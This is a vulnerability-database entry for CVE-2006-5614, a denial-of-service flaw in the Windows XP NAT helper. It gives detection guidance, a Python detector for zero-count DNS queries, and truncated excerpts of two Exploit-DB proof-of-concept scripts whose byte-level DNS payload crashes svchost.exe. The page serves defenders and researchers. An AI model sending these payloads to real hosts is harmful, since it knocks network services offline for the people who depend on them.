CVE-2006-5614
Published 2006-10-31
Priority P4 · 23 · low · 2.6 · CVSS 2.0
AV:N/AC:H/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 79.09% (99.5th percentile)
Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference.
Detection & IOCs (extracted from sources)
- Malformed DNS query with all-zero counts (Questions=0, Answer RRs=0, Authority RRs=0, Additional RRs=0) but with a trailing query body triggers the null pointer dereference in ipnathlp.dll. Detect UDP/53 packets with this header pattern directed at ICS-enabled hosts.
- The exploit targets port 53 UDP on the ICS gateway (NAT helper). Anomalous DNS traffic to internal ICS gateway IPs with malformed zero-count headers should be flagged.
- The vulnerability is only exploitable when Internet Connection Sharing (ICS) is enabled on the target Windows XP SP2 host. Systems without ICS enabled are not affected.
- The attacker must be on the same local network segment as the ICS gateway (LAN-side), as the exploit targets the internal NAT interface IP (e.g., 192.168.0.1), not a public-facing address.
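One way to express the header check from the bullets above as detection logic. This is an added example, not a rule from any of the indexed sources; the function names, the packet tuple layout and the sample packets are assumptions constructed for illustration.

```python
import struct

# DNS header: ID, flags, then the four section counts (QD, AN, NS, AR).
DNS_HEADER = struct.Struct("!HHHHHH")

def is_zero_count_query(payload: bytes) -> bool:
    """True for a DNS query whose four section counts are all zero
    but which still carries bytes after the 12-byte header."""
    if len(payload) <= DNS_HEADER.size:
        return False  # truncated, or header only: no trailing body
    _txid, flags, qd, an, ns, ar = DNS_HEADER.unpack_from(payload)
    is_query = (flags & 0x8000) == 0  # QR bit clear means query
    return is_query and (qd, an, ns, ar) == (0, 0, 0, 0)

def flag_packets(packets, ics_gateways):
    """packets: iterable of (src, dst, proto, dport, payload) tuples
    (hypothetical layout). Returns (src, dst) pairs worth alerting on."""
    hits = []
    for src, dst, proto, dport, payload in packets:
        if proto != "udp" or dport != 53 or dst not in ics_gateways:
            continue
        if is_zero_count_query(payload):
            hits.append((src, dst))
    return hits

# Constructed samples. ZERO_COUNT reuses the header values and the first
# label bytes shown in the listings on this page; the rest is made up.
ZERO_COUNT = DNS_HEADER.pack(0x6CB6, 0x0100, 0, 0, 0, 0) + b"\x03www"
NORMAL = (DNS_HEADER.pack(0x1234, 0x0100, 1, 0, 0, 0)
          + b"\x03www\x07example\x03com\x00" + struct.pack("!HH", 1, 1))
RESPONSE = DNS_HEADER.pack(0x1234, 0x8100, 0, 0, 0, 0) + b"\x03www"
HEADER_ONLY = DNS_HEADER.pack(0x1234, 0x0100, 0, 0, 0, 0)

SAMPLE_PACKETS = [
    ("192.168.0.2", "192.168.0.1", "udp", 53, ZERO_COUNT),    # flagged
    ("192.168.0.3", "192.168.0.1", "udp", 53, NORMAL),        # ordinary query
    ("192.168.0.2", "192.168.0.9", "udp", 53, ZERO_COUNT),    # not an ICS gateway
    ("192.168.0.4", "192.168.0.1", "udp", 5353, ZERO_COUNT),  # wrong port
]

if __name__ == "__main__":
    for src, dst in flag_packets(SAMPLE_PACKETS, {"192.168.0.1"}):
        print(f"ALERT zero-count DNS query {src} -> {dst}:53/udp")
```

The check looks only at the LAN-side gateway addresses passed in `ics_gateways`, since the bullets above place the sender on the same segment as the ICS host.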
No detection rules found.
Exploit-DB
Microsoft Windows - NAT Helper Components Remote Denial of Service
exploitdb·2006-10-30
---
#!/usr/bin/perl
##
## Microsoft Windows NAT Helper Components Remote DoS Exploit (2)
## **************************************************************
##
## .details
## --------
## Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
##
## .info
## -----
## code by x82
## bug by h07
##
## .greetz
## -------
## ... goes out to triple6, wolf, lux2, EaTh, darkkilla, 2letterman .. ;)
##
##
use warnings;
use diagnostics;
use strict;
use IO::Socket;
my $host = $ARGV[0]; # 192.168.0.1
my $port = 53; # standard port
my $payload =
# by h07
"\x6c\xb6".
"\x01\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00". # \n";
print "bug discovered by h07 \n";
print "------------------------------------------------
Exploit-DB
Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service
exploitdb·2006-10-28
---
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##
from socket import *
from time import sleep
host = "192.168.0.1"
port = 53
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06
Metasploit
Microsoft Windows NAT Helper Denial of Service
metasploit
This module exploits a denial of service vulnerability within the Internet Connection Sharing service in Windows XP.
No writeups or analysis indexed.
- http://research.eeye.com/html/alerts/zeroday/20061028.html
- http://secunia.com/advisories/22592
- http://securitytracker.com/id?1017133
- http://www.osvdb.org/30096
- http://www.securityfocus.com/bid/20804
- http://www.vupen.com/english/advisories/2006/4248
- https://exchange.xforce.ibmcloud.com/vulnerabilities/29917
- https://www.exploit-db.com/exploits/2672